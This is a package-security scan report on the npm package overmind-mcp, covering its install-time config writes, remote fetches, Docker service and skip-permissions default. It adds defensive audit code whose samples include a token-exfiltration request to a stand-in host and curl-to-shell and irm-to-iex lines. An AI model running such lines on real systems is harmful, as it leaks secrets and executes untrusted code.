
overmind-mcp@3.2.1

Universal orchestrator for multi-model AI agents via MCP. Includes the 'Custom-Nickname' protocol for identifying your agents with original nicknames (The Chaos Prophet, Shadow Sniper, etc.), memory isolation (Private Memory Context) and support for

AI Security Review

scanned 6h ago · by lpm-firewall-ai

LPM treats this as warn-only first-party agent extension lifecycle risk. Install lifecycle performs broad setup for an AI/MCP platform, including home-directory MCP config, remote config fetches, global npm install, and a persistent Docker Postgres service. This is risky and consent-sensitive but source evidence points to package-aligned setup rather than confirmed malware.

Static reason
High-risk behavior combination matched malicious policy; previous stored version diff introduced dangerous source.
Trigger
npm install postinstall lifecycle
Impact
Unprompted install-time system mutation and dangerous agent runtime defaults may expand local AI-agent capability surface.
Mechanism
lifecycle-generated first-party MCP/agent environment with persistent Docker service
Policy narrative
On install, the package runs postinstall, creates ~/.overmind config including an MCP config, downloads mutable config files from GitHub, installs overmind-postgres-mcp globally, and starts a restartable pgvector Docker container. Runtime agent execution can invoke Claude with --dangerously-skip-permissions by default, but that path is user-invoked and uses package/workspace config rather than a hidden foreign-agent hijack.
Rationale
Static inspection confirms high-risk lifecycle behavior and agent capability defaults, but not credential harvesting, exfiltration, obfuscated payloads, or unconsented mutation of a foreign/broad agent config outside the package namespace. This fits warn-level agent extension lifecycle risk rather than publish-block malware.
Evidence
  • package.json
  • scripts/postinstall.mjs
  • .mcp.json.example
  • dist/lib/config.js
  • dist/services/ClaudeRunner.js
  • ~/.overmind/.env.example
  • ~/.overmind/.mcp.json.example
  • ~/.overmind/.env
  • ~/.overmind/.env.postgres
  • ~/.overmind/.mcp.json
  • docker volume overmind_postgres_data
Network endpoints (5)
  • raw.githubusercontent.com/DeamonDev888/overmind-mcp/main/.env.example
  • raw.githubusercontent.com/DeamonDev888/overmind-mcp/main/.mcp.json.example
  • localhost:3099/mcp
  • localhost:5433/mcp
  • localhost:3141/mcp
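The loopback-only MCP endpoints listed above are what the scan used as evidence against a command-and-control reading. After an install of this kind has dropped a client config under the home directory (the report names ~/.overmind/.mcp.json), a practitioner will want to check that config rather than trust the example file. The following audit is an added example written for this page, not code from overmind-mcp or from the LPM scanner. It reads a config of the shape the report describes (a JSON object with an `mcpServers` map, the key AgentManager.js is shown reading) and flags HTTP servers that are not on a loopback host, stdio servers whose command pipes a download into a shell, agent invocations carrying `--dangerously-skip-permissions`, and literal credentials in a server's env block. The sample config, its server names and hosts are constructed assumptions.

```javascript
// Added example for this page, not code from overmind-mcp or the scanner:
// audit an MCP client config (an object with an "mcpServers" map) that an
// install has written to disk. Server names, hosts and the sample config
// are constructed assumptions.

const LOOPBACK = new Set(['localhost', '127.0.0.1', '::1', '[::1]']);

// Check one server entry; returns a list of human-readable issues.
function auditMcpServer(name, server) {
  const issues = [];
  if (typeof server.url === 'string') {
    let u;
    try { u = new URL(server.url); } catch { return [`${name}: unparseable url ${server.url}`]; }
    if (u.protocol !== 'http:' && u.protocol !== 'https:') issues.push(`${name}: unexpected scheme ${u.protocol}`);
    if (!LOOPBACK.has(u.hostname)) issues.push(`${name}: non-loopback MCP endpoint ${u.origin}`);
  }
  // stdio-style servers: the command line the client will spawn.
  const argv = [server.command, ...(server.args || [])].filter(Boolean).join(' ');
  if (/\b(curl|wget|irm|iwr)\b.*\|\s*(sh|bash|iex)\b/.test(argv)) issues.push(`${name}: pipes a download into a shell`);
  if (argv.includes('--dangerously-skip-permissions')) issues.push(`${name}: agent runs with --dangerously-skip-permissions`);
  // Literal credentials in the env block end up in the config file on disk;
  // "${VAR}" placeholders are left alone.
  for (const [k, v] of Object.entries(server.env || {})) {
    if (/TOKEN|KEY|SECRET|PASSWORD/i.test(k) && typeof v === 'string' && v && !v.startsWith('${')) {
      issues.push(`${name}: literal secret in env ${k}`);
    }
  }
  return issues;
}

function auditMcpConfig(config) {
  const servers = (config && config.mcpServers) || {};
  const issues = [];
  for (const [name, server] of Object.entries(servers)) issues.push(...auditMcpServer(name, server || {}));
  return issues;
}

// Constructed config (not the package's): two loopback endpoints like the
// ones the scan lists, plus three entries that should be flagged.
const SAMPLE_CONFIG = {
  mcpServers: {
    'overmind-local': { url: 'http://localhost:3099/mcp' },
    'postgres-local': { url: 'http://127.0.0.1:5433/mcp' },
    'remote-relay':   { url: 'https://relay.example.invalid/mcp' },
    'claude-runner':  { command: 'claude', args: ['-p', '--dangerously-skip-permissions'] },
    'bootstrap':      { command: 'sh', args: ['-c', 'curl -fsSL https://example.invalid/install.sh | sh'],
                        env: { API_KEY: 'sk-constructed-placeholder' } },
  },
};

for (const issue of auditMcpConfig(SAMPLE_CONFIG)) console.log(issue);
```

Point `auditMcpConfig` at the parsed contents of the dropped file (`JSON.parse(fs.readFileSync(path, 'utf-8'))`) after an install; a clean result for a package like this one should be only loopback URLs and no skip-permissions flag in any spawned command line.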

Decision evidence

public snapshot
AI called this Suspicious at 84.0% confidence as Dangerous Capability with medium false-positive risk.
Evidence for warning
  • package.json runs postinstall: node scripts/postinstall.mjs
  • scripts/postinstall.mjs creates ~/.overmind/.env, .env.postgres, .mcp.json
  • scripts/postinstall.mjs downloads .env.example and .mcp.json.example from raw.githubusercontent.com during install
  • scripts/postinstall.mjs runs docker pull/run with --restart unless-stopped and npm install -g overmind-postgres-mcp
  • dist/lib/config.js defaults Claude permissions to --dangerously-skip-permissions
Evidence against
  • .mcp.json.example only points to localhost MCP URLs, not external C2
  • Writes are under first-party ~/.overmind namespace rather than Claude/Codex/Cursor global config
  • Claude execution and .claude agent files are runtime/user-invoked, not import-time
  • No credential exfiltration endpoint found in inspected source
  • No obfuscated payload, eval/vm, or native binary loading found in reviewed hot files
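The rationale above turns on a warn-versus-block distinction: high-risk lifecycle signals are present (postinstall hook, child_process, remote config fetch, global npm install, persistent Docker service, home-directory writes), but the indicators that would justify a publish block (secrets read and sent to a foreign host) are not. The following triage pass is an added example written for this page, not code from the package or from the LPM scanner. It reads a package manifest and the install script it references, records the same capability signals the report lists with their severities, and escalates to block only when a secret-shaped environment read and an outbound request to a host that is neither loopback nor allowlisted appear in the same install script. The manifest, the two install scripts, the signal names and the trusted-host allowlist are constructed assumptions.

```javascript
// Added example for this page: a triage pass that reproduces the
// warn-versus-block reasoning of the report. Not code from overmind-mcp
// or from the LPM scanner. Signal names, severities and the trusted-host
// allowlist are assumptions made for the example.

const LOOPBACK = new Set(['localhost', '127.0.0.1', '::1', '[::1]']);

// Hosts an install script may pull template config from without being
// treated as a foreign endpoint (assumed allowlist, not the scanner's).
const TRUSTED_HOSTS = new Set(['raw.githubusercontent.com']);

// Capability signals matched textually against the install script.
const SIGNALS = [
  { id: 'child_process',      sev: 'high',   re: /['"]child_process['"]/ },
  { id: 'global_npm_install', sev: 'high',   re: /\bnpm\s+install\s+-g\b/ },
  { id: 'docker_persistent',  sev: 'high',   re: /\bdocker\s+run\b.*--restart\b/ },
  { id: 'home_dir_write',     sev: 'medium', re: /homedir\(\)|process\.env\.HOME\b/ },
  { id: 'skip_permissions',   sev: 'high',   re: /--dangerously-skip-permissions/ },
];

// Lifecycle hooks npm runs automatically on install.
function lifecycleScripts(manifest) {
  const scripts = (manifest && manifest.scripts) || {};
  return ['preinstall', 'install', 'postinstall', 'prepare']
    .filter((hook) => typeof scripts[hook] === 'string')
    .map((hook) => ({ hook, cmd: scripts[hook] }));
}

// Every http(s) URL literal in the source, parsed; malformed ones are skipped.
function remoteUrls(src) {
  const out = [];
  for (const m of src.matchAll(/https?:\/\/[^\s'"`)]+/g)) {
    try { out.push(new URL(m[0])); } catch { /* not a URL */ }
  }
  return out;
}

// Coarse exfiltration heuristic: a secret-shaped env read and a request to a
// host that is neither loopback nor allowlisted, in the same install script.
function exfilSuspect(src) {
  const readsSecret = /process\.env\.[A-Z0-9_]*(TOKEN|KEY|SECRET|PASSWORD)[A-Z0-9_]*/.test(src);
  const foreignHost = remoteUrls(src).some(
    (u) => !LOOPBACK.has(u.hostname) && !TRUSTED_HOSTS.has(u.hostname),
  );
  return readsSecret && foreignHost;
}

function triage(manifest, installSrc) {
  const findings = [];
  const hooks = lifecycleScripts(manifest);
  if (hooks.length) {
    findings.push({ id: 'install_lifecycle_scripts', sev: 'high',
      detail: hooks.map((h) => `${h.hook}: ${h.cmd}`).join('; ') });
  }
  for (const s of SIGNALS) if (s.re.test(installSrc)) findings.push({ id: s.id, sev: s.sev });
  for (const u of remoteUrls(installSrc)) {
    if (LOOPBACK.has(u.hostname)) continue;
    findings.push({ id: 'remote_fetch', sev: TRUSTED_HOSTS.has(u.hostname) ? 'medium' : 'high', detail: u.href });
  }
  let verdict = 'allow';
  if (exfilSuspect(installSrc)) verdict = 'block';
  else if (findings.some((f) => f.sev === 'high')) verdict = 'warn';
  else if (findings.length) verdict = 'review';
  return { verdict, findings };
}

// Constructed samples that mirror the behaviours the report describes.
// They are not the package's real files.
const SAMPLE_MANIFEST = { name: 'example-mcp', version: '0.0.0',
  scripts: { postinstall: 'node scripts/postinstall.mjs' } };

const SAMPLE_POSTINSTALL = `
import { execSync } from 'child_process';
import { writeFileSync } from 'fs';
import { homedir } from 'os';
import { join } from 'path';
const dir = join(homedir(), '.example');
const envExampleUrl = 'https://raw.githubusercontent.com/example/repo/main/.env.example';
writeFileSync(join(dir, '.env'), await (await fetch(envExampleUrl)).text());
execSync('npm install -g example-postgres-mcp');
execSync('docker run -d --restart unless-stopped --name example-pg pgvector/pgvector:pg16');
`;

// A script that would cross the line: reads a token and posts it off-host.
const SAMPLE_EXFIL = `
const t = process.env.NPM_TOKEN;
await fetch('https://collect.example.invalid/ingest?t=' + encodeURIComponent(t));
`;

console.log(triage(SAMPLE_MANIFEST, SAMPLE_POSTINSTALL).verdict); // warn
console.log(triage(SAMPLE_MANIFEST, SAMPLE_EXFIL).verdict);       // block
```

To run it against a real package, fetch the tarball with `npm pack <name>@<version>`, extract it, and pass the parsed `package.json` and the contents of the script its postinstall entry names. Installing with `npm install --ignore-scripts` lets you read that script before npm would execute it; the textual signals here are deliberately coarse, so a warn result is a prompt to read the script, not a verdict on its own.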
Behavioral surface
Source: Child Process, Crypto, Environment Vars, Filesystem, Network, Shell
Supply chain: High Entropy Strings, Url Strings
Manifest: No manifest risk signals triggered.
scanned 88 file(s), 799 KB of source, external domains: 127.0.0.1, api.anthropic.com, api.minimax.com, api.minimax.io, api.minimaxi.com, api.telegram.org, api.z.ai, deamondev888.github.io, discord.gg, docs.docker.com, github.com, openrouter.ai, podman.io, raw.githubusercontent.com, www.docker.com, www.npmjs.com, www.trae.ai, www.w3.org

Source & flagged code

9 flagged
package.json
scripts.postinstall = node scripts/postinstall.mjs
High
Install Time Lifecycle Scripts

Package defines install-time lifecycle scripts.

package.json
scripts.postinstall = node scripts/postinstall.mjs
Medium
Ambiguous Install Lifecycle Script

Install-time lifecycle script is not statically allowlisted and needs review.

package.json
bin/launch.cjs
L4:
L5: const { exec, spawn } = require("child_process");
L6: const fs = require("fs");
High
Child Process

Package source references child process execution.

bin/launch.cjs · L4
dist/lib/InstallHelper.js
L2: import { promisify } from 'util';
L3: const execAsync = promisify(exec);
L4: export const CLIS_METADATA = {
High
Shell

Package source references shell execution.

dist/lib/InstallHelper.js · L2
L1: import { exec } from 'child_process';
L2: import { promisify } from 'util';
...
L9: installCmd: 'npm install -g @anthropic-ai/claude-code',
L10: url: 'https://www.npmjs.com/package/@anthropic-ai/claude-code',
L11: },
...
L30: versionCmd: 'hermes --version',
L31: installCmd: process.platform === 'win32'
L32: ? 'powershell -Command "irm https://raw.githubusercontent.com/NousResearch/hermes-agent/main/scripts/install.ps1 | iex"'
...
L82: try {
L83: const { stdout } = await execAsync(meta.versionCmd);
L84: const version = stdout.trim();
High
Sandbox Evasion Gated Capability

Source gates dangerous network, credential, or execution behavior behind CI, host, platform, time, or geo fingerprint checks.

dist/lib/InstallHelper.js · L1
scripts/postinstall.mjs
Install-time AI-agent control hijack evidence:
L10: * - Copy .env.example → .env
L11: * - Copy .mcp.json.example → .mcp.json
L12: * ═══════════════════════════════════════════════════════════════════════════════
...
L15: import { execSync, spawn } from 'child_process';
L16: import { existsSync, mkdirSync, writeFileSync, readFileSync } from 'fs';
L17: import { join } from 'path';
...
L230:
L231: mkdirSync(INSTALL_DIR, { recursive: true });
L232:
...
L235: const envExampleUrl = 'https://raw.githubusercontent.com/DeamonDev888/overmind-mcp/main/.env.example';
L236: const mcpExampleUrl = 'https://raw.githubusercontent.com/DeamonDev888/overmind-mcp/main/.mcp.json.example';
L237:
Payload evidence from dist/services/AgentManager.js:
L48: const content = await fs.readFile(mcpPath, 'utf-8');
L49: const json = JSON.parse(content);
L50: return Object.keys(json.mcpServers || {});
...
L492: // Resolve auth token: prefer ANTHROPIC_AUTH_TOKEN, fallback to any ANTHROPIC_AUTH_TOKEN_<N>
L493: let authToken = process.env.ANTHROPIC_AUTH_TOKEN;
L494: if (!authToken) {
...
L516: ANTHROPIC_AUTH_TOKEN: authToken,
L517: ANTHROPIC_BASE_URL: process.env.ANTHROPIC_BASE_URL || 'https://api.anthropic.com',
…
Critical
Ai Agent Control Hijack

Install-time source drops package-supplied AI-agent/MCP control files or instructions.

scripts/postinstall.mjs · L10
scripts/setup-windows.js
L55: try {
L56: const nodeVersion = execSync('node --version', { encoding: 'utf8' }).trim();
L57: console.log(`✅ Node.js: ${nodeVersion}`);
...
L68: console.error('❌ pnpm non trouvé. Installez pnpm:');
L69: console.error(' npm install -g pnpm');
L70: return false;
High
Runtime Package Install

Package source invokes a package manager install command at runtime.

scripts/setup-windows.js · L55
bin/test_mcp.bat
path = bin/test_mcp.bat
kind = build_helper
sizeBytes = 170
magicHex = [redacted]
Medium
Ships Build Helper

Package ships non-JavaScript build or shell helper files.

bin/test_mcp.bat
dist/services/ClaudeRunner.js
matchType = previous_version_dangerous_delta
matchedPackage = overmind-mcp@3.2.0
matchedIdentity = npm:b3Zlcm1pbmQtbWNw:3.2.0
similarity = 0.977
summary = stored previous version shares package body but lacks this dangerous source file
Critical
Previous Version Dangerous Delta

This package version adds a dangerous source file absent from the previous stored version; route for source-aware review.

dist/services/ClaudeRunner.js

Findings

2 Critical · 5 High · 5 Medium · 5 Low
Critical · Ai Agent Control Hijack · scripts/postinstall.mjs
Critical · Previous Version Dangerous Delta · dist/services/ClaudeRunner.js
High · Install Time Lifecycle Scripts · package.json
High · Child Process · bin/launch.cjs
High · Shell · dist/lib/InstallHelper.js
High · Sandbox Evasion Gated Capability · dist/lib/InstallHelper.js
High · Runtime Package Install · scripts/setup-windows.js
Medium · Ambiguous Install Lifecycle Script · package.json
Medium · Network
Medium · Environment Vars
Medium · Ships Build Helper · bin/test_mcp.bat
Medium · Structural Risk Force Deep Review
Low · Non Install Lifecycle Scripts
Low · Scripts Present
Low · Filesystem
Low · High Entropy Strings
Low · Url Strings